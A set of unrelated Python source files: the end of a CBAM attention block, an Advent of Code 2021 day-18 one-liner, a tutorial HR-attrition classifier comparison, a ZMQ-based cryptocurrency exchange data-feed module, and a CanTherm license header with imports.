assert avg_pool.shape[-1] == 1
max_pool = Lambda(lambda x: K.max(x, axis=3, keepdims=True))(cbam_feature)
assert max_pool.shape[-1] == 1
concat = Concatenate(axis=3)([avg_pool, max_pool])
assert concat.shape[-1] == 2
cbam_feature = Conv2D(filters = 1,
kernel_size=kernel_size,
strides=1,
padding='same',
activation='sigmoid',
kernel_initializer='he_normal',
use_bias=False)(concat)
assert cbam_feature.shape[-1] == 1
if K.image_data_format() == "channels_first":
cbam_feature = Permute((3, 1, 2))(cbam_feature)
return multiply([input_feature, cbam_feature])
|
<reponame>twright0/aoc-2021-oneline
from aocd import get_data
from aocd.transforms import lines
from functools import reduce
import json
nums = lines(get_data(year=2021,day=18))
print((init := (lambda v,d,up: (((i := {}) or True) and
i.update({'v': v, 'depth': d, 'up': up, 'right': None, 'left': None}
if type(v) != list else
{'v': None, 'depth': d, 'up': up,
'left': init(v[0],d+1,i), 'right': init(v[1],d+1,i)}) or i)
)) and
(first_parent := (lambda last, curr, direction: (curr
if ((not curr) or
curr[direction] is not last) else
first_parent(curr, curr['up'], direction)))) and
(descendent := (lambda curr, direction: (curr
if curr['v'] is not None else
descendent(curr[direction],direction)))) and
(left_inorder := (lambda n: (
(parent := first_parent(n, n['up'], 'left')) and
(descendent(parent['left'], 'right'))
))) and
(right_inorder := (lambda n: (
(parent := first_parent(n, n['up'], 'right')) and
(descendent(parent['right'], 'left'))
))) and
(explode := (lambda n: ((
(
((nl := left_inorder(n)) or True) and
((nr := right_inorder(n)) or True) and
(nl.update({'v': nl['v'] + n['left']['v']}) if nl is not None else None) or
(nr.update({'v': nr['v'] + n['right']['v']}) if nr is not None else None) or
(n.update({'v': 0, 'right': None, 'left': None})) or
True
) if n['v'] is None and n['depth'] == 4 else
((explode(n['left']) or explode(n['right']) or False)
if n['v'] is None else
(False)))
))) and
(split := (lambda n: (
(False if n['v'] < 10 else (
n.update({'left': init(int(n['v']/2), n['depth']+1, n)}) or
n.update({'right': init((int(n['v']/2)
if n['v'] % 2 == 0 else
int(n['v']/2)+1),
n['depth']+1,n)}) or
n.update({'v': None}) or
True)
)
if n['v'] is not None else
(split(n['left']) or split(n['right']) or False)
))) and
(run_reduction := lambda n: (
(state := [n]) and
reduce(lambda _, n: (state.append(n)
if explode(n) or split(n) else
n),
state, None))) and
(magnitude := (lambda n: n['v'] if n['v'] is not None else (3 * magnitude(n['left']) +
2 * magnitude(n['right'])))) and
(incr := (lambda n: (n.update({'depth': n['depth']+1}) or
(incr(n['right']) if n['right'] is not None else True) and
(incr(n['left']) if n['left'] is not None else True)) and True)) and
magnitude(reduce(lambda state, num: (
incr(state) and
(n2 := init(json.loads(num),0,None)) and
incr(n2) and
(new_state := init(0,0,None)) and
(new_state.update({'right': n2, 'left': state, 'v': None}) or True) and
(n2.update({'up': new_state}) or True) and
(state.update({'up': new_state}) or True) and
run_reduction(new_state) and
new_state
), nums[1:], init(json.loads(nums[0]),0,None)))
)
|
<reponame>PacktPublishing/Extending-Machine-Learning-Algorithms<gh_stars>1-10
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score,classification_report
import matplotlib.pyplot as plt
hrattr_data = pd.read_csv("WA_Fn-UseC_-HR-Employee-Attrition.csv")
print (hrattr_data.head())
hrattr_data['Attrition_ind'] = 0
hrattr_data.loc[hrattr_data['Attrition']=='Yes','Attrition_ind'] = 1
dummy_busnstrvl = pd.get_dummies(hrattr_data['BusinessTravel'], prefix='busns_trvl')
dummy_dept = pd.get_dummies(hrattr_data['Department'], prefix='dept')
dummy_edufield = pd.get_dummies(hrattr_data['EducationField'], prefix='edufield')
dummy_gender = pd.get_dummies(hrattr_data['Gender'], prefix='gend')
dummy_jobrole = pd.get_dummies(hrattr_data['JobRole'], prefix='jobrole')
dummy_maritstat = pd.get_dummies(hrattr_data['MaritalStatus'], prefix='maritalstat')
dummy_overtime = pd.get_dummies(hrattr_data['OverTime'], prefix='overtime')
continuous_columns = ['Age','DailyRate','DistanceFromHome','Education','EnvironmentSatisfaction',
'HourlyRate', 'JobInvolvement', 'JobLevel','JobSatisfaction','MonthlyIncome', 'MonthlyRate', 'NumCompaniesWorked',
'PercentSalaryHike', 'PerformanceRating', 'RelationshipSatisfaction','StockOptionLevel', 'TotalWorkingYears',
'TrainingTimesLastYear','WorkLifeBalance', 'YearsAtCompany', 'YearsInCurrentRole', 'YearsSinceLastPromotion',
'YearsWithCurrManager']
hrattr_continuous = hrattr_data[continuous_columns]
hrattr_continuous['Age'].describe()
hrattr_data['BusinessTravel'].value_counts()
hrattr_data_new = pd.concat([dummy_busnstrvl,dummy_dept,dummy_edufield,dummy_gender,dummy_jobrole,
dummy_maritstat,dummy_overtime,hrattr_continuous,hrattr_data['Attrition_ind']],axis=1)
# Train & Test split
x_train,x_test,y_train,y_test = train_test_split(hrattr_data_new.drop(['Attrition_ind'],axis=1),
hrattr_data_new['Attrition_ind'],train_size = 0.7,random_state=42)
# Decision Tree Classifier
from sklearn.tree import DecisionTreeClassifier
dt_fit = DecisionTreeClassifier(criterion="gini",max_depth=5,min_samples_split=2,min_samples_leaf=1,random_state=42)
dt_fit.fit(x_train,y_train)
print ("\nDecision Tree - Train Confusion Matrix\n\n",pd.crosstab(y_train,dt_fit.predict(x_train),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nDecision Tree - Train accuracy:",round(accuracy_score(y_train,dt_fit.predict(x_train)),3))
print ("\nDecision Tree - Train Classification Report\n",classification_report(y_train,dt_fit.predict(x_train)))
print ("\n\nDecision Tree - Test Confusion Matrix\n\n",pd.crosstab(y_test,dt_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nDecision Tree - Test accuracy:",round(accuracy_score(y_test,dt_fit.predict(x_test)),3))
print ("\nDecision Tree - Test Classification Report\n",classification_report(y_test,dt_fit.predict(x_test)))
# Tuning class weights to analyze accuracy, precision & recall
dummyarray = np.empty((6,10))
dt_wttune = pd.DataFrame(dummyarray)
dt_wttune.columns = ["zero_wght","one_wght","tr_accuracy","tst_accuracy","prec_zero","prec_one",
"prec_ovll","recl_zero","recl_one","recl_ovll"]
zero_clwghts = [0.01,0.1,0.2,0.3,0.4,0.5]
for i in range(len(zero_clwghts)):
clwght = {0:zero_clwghts[i],1:1.0-zero_clwghts[i]}
dt_fit = DecisionTreeClassifier(criterion="gini",max_depth=5,min_samples_split=2,
min_samples_leaf=1,random_state=42,class_weight = clwght)
dt_fit.fit(x_train,y_train)
dt_wttune.loc[i, 'zero_wght'] = clwght[0]
dt_wttune.loc[i, 'one_wght'] = clwght[1]
dt_wttune.loc[i, 'tr_accuracy'] = round(accuracy_score(y_train,dt_fit.predict(x_train)),3)
dt_wttune.loc[i, 'tst_accuracy'] = round(accuracy_score(y_test,dt_fit.predict(x_test)),3)
clf_sp = classification_report(y_test,dt_fit.predict(x_test)).split()
dt_wttune.loc[i, 'prec_zero'] = float(clf_sp[5])
dt_wttune.loc[i, 'prec_one'] = float(clf_sp[10])
dt_wttune.loc[i, 'prec_ovll'] = float(clf_sp[17])
dt_wttune.loc[i, 'recl_zero'] = float(clf_sp[6])
dt_wttune.loc[i, 'recl_one'] = float(clf_sp[11])
dt_wttune.loc[i, 'recl_ovll'] = float(clf_sp[18])
print ("\nClass Weights",clwght,"Train accuracy:",round(accuracy_score(y_train,dt_fit.predict(x_train)),3),"Test accuracy:",round(accuracy_score(y_test,dt_fit.predict(x_test)),3))
print ("Test Confusion Matrix\n\n",pd.crosstab(y_test,dt_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
# Bagging Classifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import BaggingClassifier
dt_fit = DecisionTreeClassifier(criterion="gini",max_depth=5,min_samples_split=2,min_samples_leaf=1,random_state=42,
class_weight = {0:0.3,1:0.7})
bag_fit = BaggingClassifier(base_estimator= dt_fit,n_estimators=5000,max_samples=0.67,max_features=1.0,
bootstrap=True,bootstrap_features=True,n_jobs=-1,random_state=42)
bag_fit.fit(x_train, y_train)
print ("\nBagging - Train Confusion Matrix\n\n",pd.crosstab(y_train,bag_fit.predict(x_train),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nBagging- Train accuracy",round(accuracy_score(y_train,bag_fit.predict(x_train)),3))
print ("\nBagging - Train Classification Report\n",classification_report(y_train,bag_fit.predict(x_train)))
print ("\n\nBagging - Test Confusion Matrix\n\n",pd.crosstab(y_test,bag_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nBagging - Test accuracy",round(accuracy_score(y_test,bag_fit.predict(x_test)),3))
print ("\nBagging - Test Classification Report\n",classification_report(y_test,bag_fit.predict(x_test)))
# Random Forest Classifier
from sklearn.ensemble import RandomForestClassifier
rf_fit = RandomForestClassifier(n_estimators=5000,criterion="gini",max_depth=5,min_samples_split=2,bootstrap=True,
max_features='auto',random_state=42,min_samples_leaf=1,class_weight = {0:0.3,1:0.7})
rf_fit.fit(x_train,y_train)
print ("\nRandom Forest - Train Confusion Matrix\n\n",pd.crosstab(y_train,rf_fit.predict(x_train),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nRandom Forest - Train accuracy",round(accuracy_score(y_train,rf_fit.predict(x_train)),3))
print ("\nRandom Forest - Train Classification Report\n",classification_report(y_train,rf_fit.predict(x_train)))
print ("\n\nRandom Forest - Test Confusion Matrix\n\n",pd.crosstab(y_test,rf_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nRandom Forest - Test accuracy",round(accuracy_score(y_test,rf_fit.predict(x_test)),3))
print ("\nRandom Forest - Test Classification Report\n",classification_report(y_test,rf_fit.predict(x_test)))
# Plot of Variable importance by mean decrease in gini
model_ranks = pd.Series(rf_fit.feature_importances_,index=x_train.columns, name='Importance').sort_values(ascending=False, inplace=False)
model_ranks.index.name = 'Variables'
top_features = model_ranks.iloc[:31].sort_values(ascending=True,inplace=False)
plt.figure(figsize=(20,10))
ax = top_features.plot(kind='barh')
_ = ax.set_title("Variable Importance Plot")
_ = ax.set_xlabel('Mean decrease in Variance')
_ = ax.set_yticklabels(top_features.index, fontsize=13)
# Random Forest Classifier - Grid Search
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split,GridSearchCV
pipeline = Pipeline([
('clf',RandomForestClassifier(criterion='gini',class_weight = {0:0.3,1:0.7}))])
parameters = {
'clf__n_estimators':(2000,3000,5000),
'clf__max_depth':(5,15,30),
'clf__min_samples_split':(2,3),
'clf__min_samples_leaf':(1,2) }
grid_search = GridSearchCV(pipeline,parameters,n_jobs=-1,cv=5,verbose=1,scoring='accuracy')
grid_search.fit(x_train,y_train)
print ('Best Training score: %0.3f' % grid_search.best_score_)
print ('Best parameters set:')
best_parameters = grid_search.best_estimator_.get_params()
for param_name in sorted(parameters.keys()):
print ('\t%s: %r' % (param_name, best_parameters[param_name]))
predictions = grid_search.predict(x_test)
print ("Testing accuracy:",round(accuracy_score(y_test, predictions),4))
print ("\nComplete report of Testing data\n",classification_report(y_test, predictions))
print ("\n\nRandom Forest Grid Search- Test Confusion Matrix\n\n",pd.crosstab(y_test, predictions,rownames = ["Actuall"],colnames = ["Predicted"]))
|
from functools import wraps as _wraps
from itertools import chain as _chain
import json
from .utils import convert_to, Logger, dec_con
from decimal import Decimal
import pandas as pd
from time import sleep
from datetime import datetime, timezone, timedelta
import zmq
import threading
from multiprocessing import Process
from .exceptions import *
from cryptotrader.utils import send_email
debug = True
# Base classes
class ExchangeConnection(object):
# Feed methods
@property
def balance(self):
return NotImplementedError("This class is not intended to be used directly.")
def returnBalances(self):
return NotImplementedError("This class is not intended to be used directly.")
def returnFeeInfo(self):
return NotImplementedError("This class is not intended to be used directly.")
def returnCurrencies(self):
return NotImplementedError("This class is not intended to be used directly.")
def returnChartData(self, currencyPair, period, start=None, end=None):
return NotImplementedError("This class is not intended to be used directly.")
# Trade execution methods
def sell(self, currencyPair, rate, amount, orderType=False):
return NotImplementedError("This class is not intended to be used directly.")
def buy(self, currencyPair, rate, amount, orderType=False):
return NotImplementedError("This class is not intended to be used directly.")
def pair_reciprocal(self, df):
df[['open', 'high', 'low', 'close']] = df.apply(
{col: lambda x: str((Decimal('1') / convert_to.decimal(x)).quantize(Decimal('0E-8')))
for col in ['open', 'low', 'high', 'close']}, raw=True).rename(columns={'low': 'high',
'high': 'low'}
)
return df.rename(columns={'quoteVolume': 'volume', 'volume': 'quoteVolume'})
## Feed daemon
# Server
class FeedDaemon(Process):
"""
Data Feed server
"""
def __init__(self, api={}, addr='ipc:///tmp/feed.ipc', n_workers=8, email={}):
"""
:param api: dict: exchange name: api instance
:param addr: str: client side address
:param n_workers: int: n threads
"""
super(FeedDaemon, self).__init__()
self.api = api
self.email = email
self.context = zmq.Context()
self.n_workers = n_workers
self.addr = addr
self.MINUTE, self.HOUR, self.DAY = 60, 60 * 60, 60 * 60 * 24
self.WEEK, self.MONTH = self.DAY * 7, self.DAY * 30
self.YEAR = self.DAY * 365
self._nonce = int("{:.6f}".format(datetime.utcnow().timestamp()).replace('.', ''))
@property
def nonce(self):
""" Increments the nonce"""
self._nonce += 33
return self._nonce
def handle_req(self, req):
req = req.split(' ')
if req[0] == '' or len(req) == 1:
return False
elif len(req) == 2:
return req[0], req[1]
else:
# Candle data
if req[1] == 'returnChartData':
if req[4] == 'None':
req[4] = datetime.utcnow().timestamp() - self.DAY
if req[5] == 'None':
req[5] = datetime.utcnow().timestamp()
call = (
req[0],
req[1],
{
'currencyPair': str(req[2]).upper(),
'period': str(req[3]),
'start': str(req[4]),
'end': str(req[5])
}
)
return call
if req[1] == 'returnTradeHistory':
args = {'currencyPair': str(req[2]).upper()}
if req[3] != 'None':
args['start'] = req[3]
if req[4] != 'None':
args['end'] = req[4]
return req[0], req[1], args
# Buy and sell orders
if req[1] == 'buy' or req[1] == 'sell':
args = {
'currencyPair': str(req[2]).upper(),
'rate': str(req[3]),
'amount': str(req[4]),
}
# order type specified?
try:
possTypes = ['fillOrKill', 'immediateOrCancel', 'postOnly']
# check type
if not req[5] in possTypes:
raise ExchangeError('Invalid orderType')
args[req[5]] = 1
except IndexError:
pass
return req[0], req[1], args
if req[1] == 'returnDepositsWithdrawals':
args = {}
if req[2] != 'None':
args['start'] = req[2]
if req[3] != 'None':
args['end'] = req[3]
return req[0], req[1], args
def worker(self):
# Init socket
sock = self.context.socket(zmq.REP)
sock.connect("inproc://workers.inproc")
while True:
try:
# Wait for request
req = sock.recv_string()
Logger.info(FeedDaemon.worker, req)
# Handle request
call = self.handle_req(req)
# Send request to api
if call:
try:
self.api[call[0]].nonce = self.nonce
rep = self.api[call[0]].__call__(*call[1:])
except ExchangeError as e:
rep = e.__str__()
Logger.error(FeedDaemon.worker, "Exchange error: %s\n%s" % (req, rep))
except DataFeedException as e:
rep = e.__str__()
Logger.error(FeedDaemon.worker, "DataFeedException: %s\n%s" % (req, rep))
if debug:
Logger.debug(FeedDaemon.worker, "Debug: %s" % req)
# send reply back to client
sock.send_json(rep)
else:
raise TypeError("Bad call format.")
except Exception as e:
send_email(self.email, "FeedDaemon Error", e)
sock.close()
raise e
def run(self):
try:
Logger.info(FeedDaemon, "Starting Feed Daemon...")
# Socket to talk to clients
clients = self.context.socket(zmq.ROUTER)
clients.bind(self.addr)
# Socket to talk to workers
workers = self.context.socket(zmq.DEALER)
workers.bind("inproc://workers.inproc")
# Launch pool of worker threads
for i in range(self.n_workers):
thread = threading.Thread(target=self.worker, args=())
thread.start()
Logger.info(FeedDaemon.run, "Feed Daemon running. Serving on %s" % self.addr)
zmq.proxy(clients, workers)
except KeyboardInterrupt:
clients.close()
workers.close()
self.context.term()
# Client
class DataFeed(ExchangeConnection):
"""
Data feeder for backtesting with TradingEnvironment.
"""
# TODO WRITE TESTS
retryDelays = [2 ** i for i in range(8)]
def __init__(self, exchange='', addr='ipc:///tmp/feed.ipc', timeout=30):
"""
:param period: int: Data sampling period
:param pairs: list: Pair symbols to trade
:param exchange: str: FeedDaemon exchange to query
:param addr: str: Client socked address
:param timeout: int:
"""
super(DataFeed, self).__init__()
# Sock objects
self.context = zmq.Context()
self.addr = addr
self.exchange = exchange
self.timeout = timeout * 1000
self.sock = self.context.socket(zmq.REQ)
self.sock.connect(addr)
self.poll = zmq.Poller()
self.poll.register(self.sock, zmq.POLLIN)
def __del__(self):
self.sock.close()
# Retry decorator
def retry(func):
""" Retry decorator """
@_wraps(func)
def retrying(*args, **kwargs):
problems = []
for delay in _chain(DataFeed.retryDelays, [None]):
try:
# attempt call
return func(*args, **kwargs)
# we need to try again
except DataFeedException as problem:
problems.append(problem)
if delay is None:
Logger.debug(DataFeed, problems)
raise MaxRetriesException('retryDelays exhausted ' + str(problem))
else:
# log exception and wait
Logger.debug(DataFeed, problem)
Logger.error(DataFeed, "No reply... -- delaying for %ds" % delay)
sleep(delay)
return retrying
def get_response(self, req):
req = self.exchange + ' ' + req
# Send request
try:
self.sock.send_string(req)
except zmq.ZMQError as e:
if 'Operation cannot be accomplished in current state' == e.__str__():
# If request timeout, restart socket
Logger.error(DataFeed.get_response, "%s request timeout." % req)
# Socket is confused. Close and remove it.
self.sock.setsockopt(zmq.LINGER, 0)
self.sock.close()
self.poll.unregister(self.sock)
# Create new connection
self.sock = self.context.socket(zmq.REQ)
self.sock.connect(self.addr)
self.poll.register(self.sock, zmq.POLLIN)
raise DataFeedException("Socket error. Restarting connection...")
# Get response
socks = dict(self.poll.poll(self.timeout))
if socks.get(self.sock) == zmq.POLLIN:
# If response, return
return self.sock.recv_json()
else:
# If request timeout, restart socket
Logger.error(DataFeed.get_response, "%s request timeout." % req)
# Socket is confused. Close and remove it.
self.sock.setsockopt(zmq.LINGER, 0)
self.sock.close()
self.poll.unregister(self.sock)
# Create new connection
self.sock = self.context.socket(zmq.REQ)
self.sock.connect(self.addr)
self.poll.register(self.sock, zmq.POLLIN)
raise RequestTimeoutException("%s request timedout" % req)
@retry
def returnTicker(self):
try:
rep = self.get_response('returnTicker')
assert isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnTicker")
@retry
def returnBalances(self):
"""
Return balance from exchange. API KEYS NEEDED!
:return: list:
"""
try:
rep = self.get_response('returnBalances')
assert isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnBalances")
@retry
def returnFeeInfo(self):
"""
Returns exchange fee informartion
:return:
"""
try:
rep = self.get_response('returnFeeInfo')
assert isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnFeeInfo")
@retry
def returnCurrencies(self):
"""
Return exchange currency pairs
:return: list:
"""
try:
rep = self.get_response('returnCurrencies')
assert isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnCurrencies")
@retry
def returnChartData(self, currencyPair, period, start=None, end=None):
"""
Return pair OHLC data
:param currencyPair: str: Desired pair str
:param period: int: Candle period. Must be in [300, 900, 1800, 7200, 14400, 86400]
:param start: str: UNIX timestamp to start from
:param end: str: UNIX timestamp to end returned data
:return: list: List containing desired asset data in "records" format
"""
try:
call = "returnChartData %s %s %s %s" % (str(currencyPair),
str(period),
str(start),
str(end))
rep = self.get_response(call)
if 'Invalid currency pair.' in rep:
try:
symbols = currencyPair.split('_')
pair = symbols[1] + '_' + symbols[0]
call = "returnChartData %s %s %s %s" % (str(pair),
str(period),
str(start),
str(end))
rep = json.loads(
self.pair_reciprocal(pd.DataFrame.from_records(self.get_response(call))).to_json(
orient='records'))
except Exception as e:
raise e
assert isinstance(rep, list), "returnChartData reply is not list"
assert int(rep[-1]['date']), "Bad returnChartData reply data"
assert float(rep[-1]['open']), "Bad returnChartData reply data"
assert float(rep[-1]['close']), "Bad returnChartData reply data"
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnChartData")
@retry
def returnTradeHistory(self, currencyPair='all', start=None, end=None):
try:
call = "returnTradeHistory %s %s %s" % (str(currencyPair),
str(start),
str(end))
rep = self.get_response(call)
assert isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnTradeHistory")
@retry
def returnDepositsWithdrawals(self, start=False, end=False):
try:
call = "returnDepositsWithdrawals %s %s" % (
str(start),
str(end)
)
rep = self.get_response(call)
assert isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnDepositsWithdrawals")
@retry
def sell(self, currencyPair, rate, amount, orderType=False):
try:
call = "sell %s %s %s %s" % (str(currencyPair),
str(rate),
str(amount),
str(orderType))
rep = self.get_response(call)
if 'Invalid currency pair.' in rep:
try:
symbols = currencyPair.split('_')
pair = symbols[1] + '_' + symbols[0]
call = "sell %s %s %s %s" % (str(pair),
str(rate),
str(amount),
str(orderType))
rep = self.get_response(call)
except Exception as e:
raise e
assert isinstance(rep, str) or isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.sell")
@retry
def buy(self, currencyPair, rate, amount, orderType=False):
try:
call = "buy %s %s %s %s" % (str(currencyPair),
str(rate),
str(amount),
str(orderType))
rep = self.get_response(call)
if 'Invalid currency pair.' in rep:
try:
symbols = currencyPair.split('_')
pair = symbols[1] + '_' + symbols[0]
call = "buy %s %s %s %s" % (str(pair),
str(rate),
str(amount),
str(orderType))
rep = self.get_response(call)
except Exception as e:
raise e
assert isinstance(rep, str) or isinstance(rep, dict)
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.buy")
# Test datafeeds
class BacktestDataFeed(ExchangeConnection):
"""
Data feeder for backtesting with TradingEnvironment.
"""
# TODO WRITE TESTS
def __init__(self, tapi, period, pairs=[], balance={}, load_dir=None):
super().__init__()
self.tapi = tapi
self.ohlc_data = {}
self._balance = balance
self.data_length = 0
self.load_dir = load_dir
self.tax = {'makerFee': '0.00150000',
'nextTier': '600.00000000',
'takerFee': '0.00250000',
'thirtyDayVolume': '0.00000000'}
self.pairs = pairs
self.period = period
def returnBalances(self):
return self._balance
def set_tax(self, tax):
"""
{'makerFee': '0.00150000',
'nextTier': '600.00000000',
'takerFee': '0.00250000',
'thirtyDayVolume': '0.00000000'}
:param dict:
:return:
"""
self.tax.update(tax)
def returnFeeInfo(self):
return self.tax
def returnCurrencies(self):
if self.load_dir:
try:
with open(self.load_dir + '/currencies.json') as file:
return json.load(file)
except Exception as e:
Logger.error(BacktestDataFeed.returnCurrencies, str(e.__cause__) + str(e))
return self.tapi.returnCurrencies()
else:
return self.tapi.returnCurrencies()
def download_data(self, start=None, end=None):
# TODO WRITE TEST
self.ohlc_data = {}
self.data_length = None
index = pd.date_range(start=start,
end=end,
freq="%dT" % self.period).ceil("%dT" % self.period)
for pair in self.pairs:
ohlc_df = pd.DataFrame.from_records(
self.tapi.returnChartData(
pair,
period=self.period * 60,
start=start,
end=end
),
nrows=index.shape[0]
)
i = -1
last_close = ohlc_df.at[ohlc_df.index[i], 'close']
while not dec_con.create_decimal(last_close).is_finite():
i -= 1
last_close = ohlc_df.at[ohlc_df.index[i], 'close']
# Replace missing values with last close
fill_dict = {col: last_close for col in ['open', 'high', 'low', 'close']}
fill_dict.update({'volume': '0E-16'})
self.ohlc_data[pair] = ohlc_df.fillna(fill_dict).ffill()
for key in self.ohlc_data:
if not self.data_length or self.ohlc_data[key].shape[0] < self.data_length:
self.data_length = self.ohlc_data[key].shape[0]
for key in self.ohlc_data:
if self.ohlc_data[key].shape[0] != self.data_length:
# self.ohlc_data[key] = pd.DataFrame.from_records(
# self.tapi.returnChartData(key, period=self.period * 60,
# start=self.ohlc_data[key].date.iloc[-self.data_length],
# end=end
# ),
# nrows=index.shape[0]
# )
self.ohlc_data[key] = self.ohlc_data[key].iloc[:self.data_length]
self.ohlc_data[key].set_index('date', inplace=True, drop=False)
print("%d intervals, or %d days of data at %d minutes period downloaded." % (self.data_length, (self.data_length * self.period) /\
(24 * 60), self.period))
def save_data(self, dir=None):
"""
Save data to disk
:param dir: str: directory relative to ./; eg './data/train
:return:
"""
for item in self.ohlc_data:
self.ohlc_data[item].to_json(dir+'/'+str(item)+'_'+str(self.period)+'min.json', orient='records')
def load_data(self, dir):
"""
Load data form disk.
JSON like data expected.
:param dir: str: directory relative to self.load_dir; eg: './self.load_dir/dir'
:return: None
"""
self.ohlc_data = {}
self.data_length = None
for key in self.pairs:
self.ohlc_data[key] = pd.read_json(self.load_dir + dir +'/'+str(key)+'_'+str(self.period)+'min.json', convert_dates=False,
orient='records', date_unit='s', keep_default_dates=False, dtype=False)
self.ohlc_data[key].set_index('date', inplace=True, drop=False)
if not self.data_length:
self.data_length = self.ohlc_data[key].shape[0]
else:
assert self.data_length == self.ohlc_data[key].shape[0]
def returnChartData(self, currencyPair, period, start=None, end=None):
try:
data = json.loads(self.ohlc_data[currencyPair].loc[start:end, :].to_json(orient='records'))
return data
except json.JSONDecodeError:
print("Bad exchange response.")
except AssertionError as e:
if "Invalid period" == e:
raise ExchangeError("%d invalid candle period" % period)
elif "Invalid pair" == e:
raise ExchangeError("Invalid currency pair.")
def reverse_data(self):
for df in self.ohlc_data:
self.ohlc_data.update({df:self.ohlc_data[df].reindex(index=self.ohlc_data[df].index[::-1])})
self.ohlc_data[df]['date'] = self.ohlc_data[df].index[::-1]
self.ohlc_data[df].index = self.ohlc_data[df].index[::-1]
self.ohlc_data[df] = self.ohlc_data[df].rename(columns={'close': 'open', 'open': 'close'})
class PaperTradingDataFeed(ExchangeConnection):
"""
Data feeder for paper trading with TradingEnvironment.
"""
# TODO WRITE TESTS
def __init__(self, tapi, period, pairs=[], balance={}):
super().__init__()
self.tapi = tapi
self._balance = balance
self.pairs = pairs
self.period = period
def returnBalances(self):
return self._balance
def returnFeeInfo(self):
return {'makerFee': '0.00150000',
'nextTier': '600.00000000',
'takerFee': '0.00250000',
'thirtyDayVolume': '0.00000000'}
def returnTicker(self):
return self.tapi.returnTicker()
def returnCurrencies(self):
"""
Return exchange currency pairs
:return: list:
"""
return self.tapi.returnCurrencies()
def returnChartData(self, currencyPair, period, start=None, end=None):
"""
Return pair OHLC data
:param currencyPair: str: Desired pair str
:param period: int: Candle period. Must be in [300, 900, 1800, 7200, 14400, 86400]
:param start: str: UNIX timestamp to start from
:param end: str: UNIX timestamp to end returned data
:return: list: List containing desired asset data in "records" format
"""
try:
return self.tapi.returnChartData(currencyPair, period, start=start, end=end)
except ExchangeError as error:
if 'Invalid currency pair.' == error.__str__():
try:
symbols = currencyPair.split('_')
pair = symbols[1] + '_' + symbols[0]
return json.loads(
self.pair_reciprocal(pd.DataFrame.from_records(self.tapi.returnChartData(pair, period,
start=start,
end=end
))).to_json(
orient='records'))
except Exception as e:
raise e
else:
raise error
# Live datafeeds
class PoloniexConnection(DataFeed):
def __init__(self, period, pairs=[], exchange='', addr='ipc:///tmp/feed.ipc', timeout=20):
"""
:param tapi: exchange api instance: Exchange api instance
:param period: int: Data period
:param pairs: list: Pairs to trade
"""
super().__init__(exchange, addr, timeout)
self.pairs = pairs
self.period = period
@DataFeed.retry
def returnChartData(self, currencyPair, period, start=None, end=None):
"""
Return pair OHLC data
:param currencyPair: str: Desired pair str
:param period: int: Candle period. Must be in [300, 900, 1800, 7200, 14400, 86400]
:param start: str: UNIX timestamp to start from
:param end: str: UNIX timestamp to end returned data
:return: list: List containing desired asset data in "records" format
"""
try:
call = "returnChartData %s %s %s %s" % (str(currencyPair),
str(period),
str(start),
str(end))
rep = self.get_response(call)
if 'Invalid currency pair.' in rep:
try:
symbols = currencyPair.split('_')
pair = symbols[1] + '_' + symbols[0]
call = "returnChartData %s %s %s %s" % (str(pair),
str(period),
str(start),
str(end))
rep = json.loads(
self.pair_reciprocal(
pd.DataFrame.from_records(
self.get_response(call)
)
).to_json(orient='records'))
except Exception as e:
raise e
assert isinstance(rep, list), "returnChartData reply is not list: %s" % str(rep)
assert int(rep[-1]['date']), "Bad returnChartData reply data"
assert float(rep[-1]['open']), "Bad returnChartData reply data"
assert float(rep[-1]['close']), "Bad returnChartData reply data"
return rep
except AssertionError:
raise UnexpectedResponseException("Unexpected response from DataFeed.returnChartData")
|
<reponame>shamelmerchant/CanTherm
#!/usr/bin/env python
"""
Copyright (c) 2002-2009 <NAME> and the CanTherm Team
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
#Computes the Eckart tunneling correction
# Inputs are:
# delV1 - energy difference between TS and reactants [=] Joules
# T - absolute temperature [=] Kelvin
# alpha1 - dimensionless energy difference between TS and reactants
# alpha2 - dimensionless energy difference between TS and reactants (if symmetric)
# or between TS and products (if asymmetric)
# Output is kappa(T), the dimensionless tunneling correction factor
import os
from numpy import *
from scipy import *
import CanTherm
